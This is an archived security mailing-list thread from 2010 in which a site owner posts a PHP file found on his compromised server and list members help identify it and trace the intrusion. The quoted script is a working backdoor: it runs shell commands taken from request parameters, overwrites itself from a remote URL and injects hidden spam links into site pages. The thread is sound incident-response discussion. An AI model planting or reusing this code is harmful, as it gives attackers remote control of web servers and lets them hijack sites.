PaulDotCom mailing list archives

Odd PHP file, trying to find out what it does

From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Mon, 1 Mar 2010 19:33:13 -0500

Well, Dreamhost responded with a something that looked like a form mail,
pointing out some of the outdated scripts I have on my sites. Thing is, most
of those sites are not the ones that were affected, and I have not details
for what the vector was. The logs I have access to don't go that far back.
I've emailed them back to see if I can get the web logs from the time period
when I think the scripts were installed.



Adrian

On Mon, Mar 1, 2010 at 2:35 PM, Adrian Crenshaw <irongeek at irongeek.com>wrote:

Goggling for the IP "89.149.242.216" and "adsttnmq1" gave me this:

http://www.phpfreaks.com/forums/index.php?topic=251135.msg1178041#msg1178041

Looks like the same person hit this guy.

Adrian


On Mon, Mar 1, 2010 at 2:32 PM, Adrian Crenshaw <irongeek at irongeek.com>wrote:

Thanks all. I googled for "adsttnmq1" earlier and found some stuff.
Looking though my logs, I found an IP of a host making a post to one of the
URLs in question. Still looking more into what it was doing.

Thanks
Adrian


On Mon, Mar 1, 2010 at 12:12 PM, Andrew Ellis <only.samurai at gmail.com>wrote:

Historically, I've seen this stuff done through a Remote File Include,
tho I can think of a dozen other ways to get it up on your server. I'd
probably start by digging through the logs looking for someone
including this file in some URL parameter.



On Mon, Mar 1, 2010 at 10:31 AM, Jim Halfpenny <jim.halfpenny at gmail.com>
wrote:

A search for the string abcdefghiklmnjsweqrtyuiopzx shows other a forum
thread with some info on this file:

http://www.webhostingtalk.com/showthread.php?t=876121

I'm sure there are other sources of info out there. Time for some

forensic

analysis of your logs to work out how and when this got here. I'm

guessing

an automated attack against a known vuln in a PHP app?

Jim

On 1 March 2010 09:16, Adrian Crenshaw <irongeek at irongeek.com> wrote:


Ok, I think one of my sites may have been compromised. I found the
following PHP script on a site, but I'm not sure what it is trying to

do.

Anyone else ever seen this script before?

Adrian

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
    unlink("c");
    unlink("1r");
  unlink("log");
}

function Clear2()
{
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  $fin = ereg_replace("<font style=\"position: absolute;overflow:
hidden;height: 0;width: 0\">", "", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
}

function GetVar($name, &$var)
{
    $var = "";
    if (isset($_POST[$name]))
        $var = $_POST[$name];

  if (isset($_GET[$name]))
        $var = $_GET[$name];

    if (($var) =="")
      return  false;
      else return true;
}

function Gen()
{
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"]))
        $sg = $_POST["sg"];

  if (isset($_GET["sg"]))
        $sg = $_GET["sg"];

    if (isset($_POST["gm"]))
      $g = $_POST["gm"];

    if (isset($_GET["gm"]))
        $g = $_GET["gm"];


    $path = "";
    $fr = fopen("1r", "a+");
    if (file_exists("c"))
    {
        $fconf = file("c");
        $tname = trim($fconf[0]);
        $cname = trim($fconf[1]);
        $curs = trim($fconf[2]);
        $pid = trim($fconf[3]);
        if ($pid == 100)
        {
            $pid = 0;
            $rnd = mt_rand(0, 999);
            $nm = "";
        for ($i=0; $i<3; $i++)
          {
              $ran = mt_rand(0,26);
              $sym = $alp[$ran];
              $nm = $nm.$sym;
          }
            $cname = $nm;
            mkdir("$tname/$cname");
            $curs = $g;
        }
    }
    else
    {
        $rnd = mt_rand(0, 999);
        $nm = "";
      for ($i=0; $i<5; $i++)
        {
            $ran = mt_rand(0,26);
            $sym = $alp[$ran];
            $nm = $nm.$sym;
        }
        $tname = $nm;
        $pid = 0;
        $curs = $g;
        mkdir($tname);
        $fht = fopen("$tname/.htaccess", "w+");
        $htname = $sg."2.txt";
        $fp = fopen($htname, "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        fwrite($fht, $fin);
        fclose($fht);
        $rnd = mt_rand(0, 999);
        $nm = "";
    for ($i=0; $i<3; $i++)
      {
          $ran = mt_rand(0,26);
          $sym = $alp[$ran];
          $nm = $nm.$sym;
      }
        $cname = $nm;
    mkdir("$tname/$cname");
    }
  $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {
        $fp = fopen($gname."?g=$curs", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);

        $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
    }

    if ($j==100)
    {
      $fp = fopen($gname."?g=$curs&m=1", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);
        $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
        fwrite($fnd, $fin);
        fclose($fnd);
        $map = "$path/$tname/$cname/$curs"."_lm.htm";
        fwrite($fr,"$map\n");
    }

    $fconf = fopen("c", "w+");
    fwrite($fconf, $tname."\n");
    fwrite($fconf, $cname."\n");
    fwrite($fconf, $curs."\n");
    $nj = $j;
    fwrite($fconf, $nj."\n");
    fclose($fconf);
}

function Update()
{
    $thisname = "1.php";
    if (isset($_POST['u']))
      $u = $_POST['u'];

    if (isset($_GET['u']))
         $u = $_GET['u'];

     $fp = fopen($u, "r");
  $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
  fclose($fp);

  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}

function Com()
{
    if (isset($_POST['c']))
      @system($_POST['c']);
  if (isset($_GET['c']))
        @system($_GET['c']);
}

function UpKos()
{
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin);
    $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}


function MRepl()
{
    $mpt = "";
    $drs = "";
    $begtag = "<adsttnmq1><font style=\"position: absolute;overflow:
hidden;height: 0;width: 0\">";
  $endtag = "</font></body></html><sdioyslkjs2> ";
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt);
     // ??????? ??????????? ???? ????
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
    $fp = fopen($mpt, "r");
  GetVar("drs", $drs);
  $fin = $fin.$begtag;
$drs = str_replace("\\", "", $drs);
  $fin = $fin.$drs;
  $fin = $fin.$endtag;
  $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}

function Main()
{
    if (isset($_POST['u']) || isset($_GET['u']))
    {
        Update();
        exit();
    }

    if (isset($_POST['c']) || isset($_GET['c']))
    {
        Com();
        exit();
    }

        if (isset($_POST['uk']) || isset($_GET['uk']))
    {
        UpKos();
        exit();
    }

    if (isset($_POST['g']) || isset($_GET['g']))
    {
        Gen();
        exit();
    }

    if (isset($_POST['s']) || isset($_GET['s']))
    {
        MRepl();
        exit();
    }

  if (isset($_POST['cl']) || isset($_GET['cl']))
    {
        Clear();
        exit();
    }

    if (isset($_POST['cl2']) || isset($_GET['cl2']))
    {
        Clear2();
        exit();
    }

    echo "<ok>";

}

Main();

?>

_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com



_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com




--
Andrew Ellis
http://blog.psych0tik.net
_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20100301/a6708920/attachment.htm

Current thread:

Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does David Hoelzer (Mar 01)
- Odd PHP file, trying to find out what it does Andrew Ellis (Mar 01)
  - Odd PHP file, trying to find out what it does Bradley McMahon (Mar 01)
  - Odd PHP file, trying to find out what it does Dimitrios Kapsalis (Mar 01)
- Odd PHP file, trying to find out what it does Jim Halfpenny (Mar 01)
  - Odd PHP file, trying to find out what it does Andrew Ellis (Mar 01)
    - Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
    - Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
    - Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)